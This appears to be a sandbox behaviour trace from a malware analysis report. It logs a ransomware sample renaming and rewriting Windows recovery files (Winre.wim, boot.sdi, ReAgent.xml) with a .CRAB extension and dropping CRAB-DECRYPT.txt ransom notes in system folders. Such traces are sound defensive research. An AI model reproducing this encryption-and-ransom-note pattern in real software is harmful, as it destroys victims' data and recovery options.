Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\bootmgr.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Move source_filename = C:\bootmgr.CRAB, destination_filename = C:\bootmgr True 1
Fn
File Create filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\PerfLogs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\PerfLogs\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Recovery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Recovery\WindowsRE\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\WindowsRE\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Get Info filename = C:\Recovery\WindowsRE\boot.sdi, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\WindowsRE\boot.sdi, destination_filename = C:\Recovery\WindowsRE\boot.sdi.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 1048576, size_out = 24576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 24576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 256 True 2
Fn
Data
File Write filename = C:\Recovery\WindowsRE\boot.sdi.CRAB, size = 8 True 1
Fn
Data
File Get Info filename = C:\Recovery\WindowsRE\ReAgent.xml, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\WindowsRE\ReAgent.xml, destination_filename = C:\Recovery\WindowsRE\ReAgent.xml.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Recovery\WindowsRE\ReAgent.xml.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\WindowsRE\ReAgent.xml.CRAB, size = 1048576, size_out = 1041 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\ReAgent.xml.CRAB, size = 1056 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\ReAgent.xml.CRAB, size = 256 True 2
Fn
Data
File Write filename = C:\Recovery\WindowsRE\ReAgent.xml.CRAB, size = 8 True 1
Fn
Data
File Get Info filename = C:\Recovery\WindowsRE\Winre.wim, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\WindowsRE\Winre.wim, destination_filename = C:\Recovery\WindowsRE\Winre.wim.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x779b0df0 True 1
Fn
File Create filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\WindowsRE\Winre.wim.CRAB, size = 1048576 True 1
Fn
Data
